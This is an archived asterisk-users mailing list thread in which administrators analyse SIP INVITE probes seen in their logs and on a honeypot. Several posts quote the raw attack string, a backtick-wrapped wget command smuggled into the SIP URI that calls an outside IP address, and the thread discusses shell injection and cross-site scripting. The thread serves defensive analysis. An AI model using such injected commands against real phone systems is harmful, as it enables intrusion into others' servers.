[asterisk-users] new sort of shell attack attempt via SIP?
I have seen this recently in my logs as well [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp(SIP/5060-002c, Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`;) in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set(SIP/5060-002c, DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`;) in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto(SIP/5060-002c, s,1) in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1) [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s@from-sip-external:1] GotoIf(SIP/5060-002c, 0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1;) in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,//91.223.89.94/V.php`,1) So can this be blocked via fail2ban and by adding a new REGEX ? Thanks Saqib -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
[asterisk-users] new sort of shell attack attempt via SIP?
I haven't seen this sort of URI/shell attack prior to today but it looks interesting. Embedding a backtick in the URI with a wget that doesn't seem to do much to an empty file. I'm guessing it is just a probe to see if they can send further embedded backtick shell commands to my Asterisk instance (by watching their weblogs @ 91.223.89.94) (This happens to be my honeypot that just accepts all calls and dumps them into one big Asterisk 10 beta ConfBridge :-) INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. Does Asterisk have shell injection weakness? Or perhaps this targets some other Asterisk config manager that is subject to injection via URI? Tom -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
Re: [asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:05 PM, Tom Browning wrote: INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed script tags and a with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack. -- Alex Balashov - Principal Evariste Systems LLC 260 Peachtree Street NW Suite 2200 Atlanta, GA 30303 Tel: +1-678-954-0670 Fax: +1-404-961-1892 Web: http://www.evaristesys.com/ -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
Re: [asterisk-users] new sort of shell attack attempt via SIP?
I disagree with the 'review CDR' angle for a number of reasons: a) there is a backtick in the URI trying to force shell and the proper wget command line to send results to /dev/null b) the V.php (at the url) appears to do nothing at all and might just be empty (for log scraping), url safety checks confirm c) the invites were sprayed across my entire IP address range To me, this is more like a scan for any SIP host that has shell injection vulerability. The list of vulnerable hosts is just a log scrape away at the server 91.223.89.94 On Sun, Sep 11, 2011 at 7:20 PM, Alex Balashov abalas...@evaristesys.com wrote: On 09/11/2011 07:05 PM, Tom Browning wrote: INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed script tags and a with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack. -- Alex Balashov - Principal Evariste Systems LLC 260 Peachtree Street NW Suite 2200 Atlanta, GA 30303 Tel: +1-678-954-0670 Fax: +1-404-961-1892 Web: http://www.evaristesys.com/ -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
Re: [asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:35 PM, Tom Browning wrote: I disagree with the 'review CDR' angle for a number of reasons: a) there is a backtick in the URI trying to force shell and the proper wget command line to send results to /dev/null b) the V.php (at the url) appears to do nothing at all and might just be empty (for log scraping), url safety checks confirm c) the invites were sprayed across my entire IP address range To me, this is more like a scan for any SIP host that has shell injection vulerability. The list of vulnerable hosts is just a log scrape away at the server 91.223.89.94 On second thought, your interpretation does make much more sense. :-) -- Alex Balashov - Principal Evariste Systems LLC 260 Peachtree Street NW Suite 2200 Atlanta, GA 30303 Tel: +1-678-954-0670 Fax: +1-404-961-1892 Web: http://www.evaristesys.com/ -- _ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users